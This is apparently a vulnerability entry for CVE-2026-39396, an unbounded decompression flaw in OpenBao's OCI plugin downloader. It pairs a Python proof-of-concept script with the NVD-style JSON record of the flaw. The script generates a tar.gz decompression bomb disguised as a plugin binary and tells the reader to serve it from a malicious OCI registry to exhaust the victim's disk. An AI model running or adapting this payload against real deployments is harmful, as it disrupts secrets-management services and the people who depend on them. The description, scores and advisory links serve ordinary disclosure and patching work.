CVE-2026-39396

import os import tarfile import gzip # PoC Concept: Generate a decompression bomb payload # This script creates a highly compressible file (zeros) and packs it into a tar.gz. # When extracted by the vulnerable OpenBao version, it consumes disk space. def generate_bomb(output_file, uncompressed_size_mb=100): """ Generates a tar.gz file that decompresses to a specified size. In a real attack, this would be much larger (GBs). """ # Create a temporary file filled with zeros (highly compressible) temp_file = "temp_large_file.bin" chunk_size = 1024 * 1024 # 1MB print(f"Generating {uncompressed_size_mb}MB payload...") with open(temp_file, "wb") as f: for _ in range(uncompressed_size_mb): f.write(b"\x00" * chunk_size) # Compress it into a tar.gz stream print("Compressing payload...") with tarfile.open(output_file, "w:gz") as tar: tar.add(temp_file, arcname="plugin_binary") # Clean up os.remove(temp_file) print(f"Bomb created: {output_file}") print("Serve this file via a malicious OCI registry to exploit CVE-2026-39396.") if __name__ == "__main__": generate_bomb("malicious_plugin.tar.gz", uncompressed_size_mb=100)

{"cve": {"id": "CVE-2026-39396", "sourceIdentifier": "[email protected]", "published": "2026-04-21T01:16:06.507", "lastModified": "2026-05-01T16:36:07.413", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenBao is an open source identity-based secrets management system. Prior to version 2.5.3, `ExtractPluginFromImage()` in OpenBao's OCI plugin downloader extracts a plugin binary from a container image by streaming decompressed tar data via `io.Copy` with no upper bound on the number of bytes written. An attacker who controls or compromises the OCI registry referenced in the victim's configuration can serve a crafted image containing a decompression bomb that decompresses to an arbitrarily large file. The SHA256 integrity check occurs after the full file is written to disk, meaning the hash mismatch is detected only after the damage (disk exhaustion) has already occurred. This allow the attacker to replace **legit plugin image** with no need to change its signature. Version 2.5.3 contains a patch."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L", "baseScore": 3.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}, {"lang": "en", "value": "CWE-674"}, {"lang": "en", "value": "CWE-770"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openbao:openbao:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.5.3", "matchCriteriaId": "FB9CD431-A4A7-47AC-8111-76D4F60A9D07"}]}]}], "references": [{"url": "https://github.com/openbao/openbao/security/advisories/GHSA-r65v-xgwc-g56j", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/openbao/openbao/security/advisories/GHSA-r65v-xgwc-g56j", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}